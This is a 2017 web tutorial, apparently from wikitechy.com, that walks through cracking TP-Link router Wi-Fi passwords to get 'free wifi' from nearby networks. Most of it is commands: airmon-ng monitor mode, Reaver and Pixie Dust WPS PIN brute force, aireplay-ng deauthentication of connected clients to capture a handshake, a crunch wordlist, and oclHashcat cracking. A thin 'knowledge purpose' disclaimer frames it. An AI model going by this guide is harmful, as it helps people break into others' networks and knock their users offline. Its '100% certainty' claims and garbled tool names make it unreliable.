[Pro] How to hack a TP link Wifi Password

wikitechy.com/technology/pro-hack-tp-link-wifi-password

About the authorView All Posts author Wikitechy Founder, Author, International Speaker, and Job Consultant. My role
as the CEO of Wikitechy, I help businesses build their next generation digital platforms and help with their product
innovation and growth strategy. I'm a frequent speaker at tech conferences and events.
May 17, 2017

[Pro] How to hack a TP link Wifi Password - Hacking - This article

show you how to hack wifi network. It is generally a bug which is
found in the routers.
Today I’m going to share how to hack TP link router wifi and hack wifi password.
In this article I will tell you simple method to get free wifi. Mainly this susceptibility is
found in Tp link Router wifi. Basically this article show you how to hack wifi network. It

1/4
is generally a bug which is found in the company routers. You just have to follow the
steps to hacking of TP Link wifi,it automatically connects to the wifi and this is 100%
sured and tested trick. Just follow the Post – How To Hack Wifi Password.

Note: This post is only for knowledge purpose and i am not responsible for
anything

Through this you can easily hack binatone wifi password by using this trick. Follow the
steps given below and use the free wifi near your home.

Steps To to Hack a TP link Wifi Password

1. Put the device in Monitor mode Airmon-ng start wlan0
2. A monitoring interface will be started on wlan0mon
3. Use iwconfig to check if the interface MODE is in managed mode, if so then
change it to monitor instead of managed with the following commands:

ifconfig wlan0mon down

iwconfig wlan0mon mode monitor
ifconfig wlan0mon up

4. iwconfig check if the mode is monitoring mode now

5. airodump-ng wlan0mon

Start airodump-ng to get the BSSID, MAC address and channel of our target.

airodump-ng -i wlan0mon

Now pick your target and use the BSSID and the channel for Reaver:

Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We need the PKE, PKR, e-hash 1&2, E/R-nonce and the authkey from Reaver to
use for pixiewps.

READ 10 Simple Steps to Become A Good Ethical Hacker

Now start pixiewps with the following arguments:

Components:
–E-Hash1 is a hash in which we brute force the first half of the PIN.
–E-Hash2 is a hash in which we brute force the second half of the PIN.
–HMAC is a function that hashes all the data in parenthesis. The function is HMAC-
SHA-256.
–PSK1 is the first half of the router’s PIN (10,000 possibilities)
–PSK2 is the second half of the router’s PIN (1,000 or 10,000 possibilities depending if
we want to compute the checksum. We just do 10,000 because it makes no time
difference and it’s just easier.)

2/4
–PKE is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange
and prevent replays.)
–PKR is the Public Key of the Registrar (used to verify the legitimacy of a WPS
exchange and prevent replays.)

This router is not vulnerable to Pixie Dust WPS Attack.

Reaver WPS PIN Attack

Let’s try to hack this router using Reaver. Start Reaver with 5 seconds delay and
imitating a win7 PC:

reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 -w

Brute forcing the router with oclHashcat

Let’s see if we can get the password by capturing a 4-way handshake and an offline
bruteforce attack with a default router password list. We will be using the following
tools:

1. Crunch to generate the password list.

2. Airodump-ng to capture the 4-way handshake.
3. airplay-ng to force de-auth connected clients.
4. oclHashcat GPU on Windows.

Let’s start Crunch with the following command:

crunch 8 8 1234567890 -o /root/Desktop/88numlist.txt

This might take a little while, the result is a 900 MB word-list containing all possible
combinations of 8 digits. This word-list will hack a TP link WR841N router wireless
network with 100% certainty.

READ 5 Best Chrome Experiments

Let’s capture the handshake with Airodump-ng and Aireplay-ng and start
Airodump-ng to find our target with the following command:

airodump-ng wlan0mon

Now pick your target’s BSSID and channel and restart Airodump-ng with the
following command and look for a connected client:

airodump-ng –bssid [BSSID] -c [channel] -w [filepath to store .cap] wlan0mon

Now de-auth the connected client using Aireplay-ng in a new terminal.

aireplay-ng -0 2 -a [BSSID] -c [Client MAC] wlan0mon

De-auth succesful and the 4 way handshake is captured!

Aircrack-ng aireplay-ng
3/4
Step 3: Bruteforce with default router password list
We’ll use oclHashcat GPU on Windows to crack the WiFi password using the
passwordlist we created earlier.

We have to convert the .cap file to a .hccap first using the following command:

aircrack-ng -J [Filepath to save .hccap file] [Filepath to .cap file]

[embedyt]http://www.youtube.com/watch?
v=WFncxKlmw2A&width=500&height=350[/embedyt]

Start oclHashcat on Windows using the following command:

oclhashcat64.exe -m 2500 -w 3 –[gpu-temp-retain=60] –status -o cracked.txt

tplink.hccap 88numlist.txt

Note: –gpu-temp-retain is AMD only.

So this is How to hack a TP link Wifi Password. Hack Tp Link and enjoy free wifi.

4/4